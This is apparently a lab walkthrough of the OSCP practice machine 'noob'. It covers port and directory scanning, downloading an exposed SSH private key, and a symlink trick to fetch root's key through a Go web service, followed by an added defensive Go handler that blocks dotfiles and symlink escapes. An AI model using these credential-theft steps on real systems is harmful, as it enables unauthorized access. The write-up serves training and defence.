【OSCP】noob

admin, 2024-06-30 15:05:30

OSCP practice lab

Target overview

noob

easy

SSH private key abuse, ln symlink abuse

Information gathering

Host discovery

Port scanning

┌──(root㉿kali)-[~]
└─# nmap -sV -A -p- -T4 192.168.1.106
Starting Nmap 7.94 ( https://nmap.org ) at 2024-02-16 05:28 EST
Nmap scan report for 192.168.1.106
Host is up (0.00073s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 66:6a:8e:22:cd:dd:75:52:a6:0a:46:06:bc:df:53:0f (RSA)
| 256 c2:48:46:33:d4:fa:c0:e7:df:de:54:71:58:89:36:e8 (ECDSA)
|_ 256 5e:50:90:71:08:5a:88:62:7e:81:07:c3:9a:c1:c1:c6 (ED25519)
65530/tcp open http Golang net/http server (Go-IPFS json-rpc or InfluxDB API)
|_http-title: Site doesn't have a title (text/plain; charset=utf-8).
MAC Address: 08:00:27:C2:5B:98 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT ADDRESS
1 0.73 ms 192.168.1.106

Directory scanning

┌──(root㉿kali)-[~]
└─# gobuster dir -w /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://192.168.1.106:65530 -x html,php,txt -e
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.1.106:65530
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: php,txt,html
[+] Expanded: true
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
http://192.168.1.106:65530/index (Status: 200) [Size: 19]
http://192.168.1.106:65530/http%3A%2F%2Fyoutube.html (Status: 301) [Size: 54] [--> /http:/youtube.html]
...
http://192.168.1.106:65530/http%3A%2F%2Fswik.php (Status: 301) [Size: 50] [--> /http:/swik.php]
http://192.168.1.106:65530/http%3A%2F%2Fswik.html (Status: 301) [Size: 51] [--> /http:/swik.html]
http://192.168.1.106:65530/nt4share (Status: 301) [Size: 45] [--> /nt4share/]
Progress: 882240 / 882244 (100.00%)
===============================================================
Finished

Gaining access

The directory scan turns up an SSH private key.

From the information above we know the username and the private key, so we try logging in over SSH with the key.

wget http://192.168.1.106:65530/nt4share/.ssh/id_rsa
chmod 600 id_rsa
ssh -i id_rsa [email protected]

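No flag was found here.

Privilege escalation

We lack the permissions to inspect port 65530 or the service behind it. Looking at the .ssh directory, we try using ln to create a symlink that maps the root directory into the web service.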


ln -s / root

Obtain root's private key

wget http://192.168.1.106:65530/nt4share/root/root/.ssh/id_rsa     
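Both key downloads above succeed because the web service on port 65530 hands out dotfiles and follows a symlink that points outside the shared directory. The handler below is an added example, not part of the original write-up or the target's code: a Go net/http file handler that refuses both cases. The `./share` root and the listen address are assumptions.

```go
package main

import (
	"fmt"
	"net/http"
	"path/filepath"
	"strings"
)

// safeResolve maps a URL path to a real file under root. It rejects dot
// segments (.ssh, ..) and anything that, once symlinks are followed, lies
// outside root, such as a link created with `ln -s / root`.
func safeResolve(root, urlPath string) (string, error) {
	for _, seg := range strings.Split(urlPath, "/") {
		if strings.HasPrefix(seg, ".") {
			return "", fmt.Errorf("dot segment %q refused", seg)
		}
	}
	realRoot, err := filepath.EvalSymlinks(root)
	if err != nil {
		return "", err
	}
	resolved, err := filepath.EvalSymlinks(filepath.Join(realRoot, filepath.FromSlash(urlPath)))
	if err != nil {
		return "", err // missing file or broken link
	}
	rel, err := filepath.Rel(realRoot, resolved)
	if err != nil || rel == ".." || strings.HasPrefix(rel, ".."+string(filepath.Separator)) {
		return "", fmt.Errorf("%q resolves outside the served root", urlPath)
	}
	return resolved, nil
}

// handler answers 404 for every refused path, the same as a missing file.
func handler(root string) http.Handler {
	return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		p, err := safeResolve(root, r.URL.Path)
		if err != nil {
			http.NotFound(w, r)
			return
		}
		http.ServeFile(w, r, p)
	})
}

func main() {
	// Assumed web root and listen address, chosen for this example only.
	fmt.Println(http.ListenAndServe("127.0.0.1:8080", handler("./share")))
}
```

The check and the file open are separate steps, so a local user who can write inside the served directory can still race them; the service account should also lack read access to anything outside that directory.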


End

Originally published on the WeChat official account 贝雷帽SEC: 【OSCP】noob

Posted 2024-06-30 15:05:30 on CN-SEC中文网: https://cn-sec.com/archives/2884473.html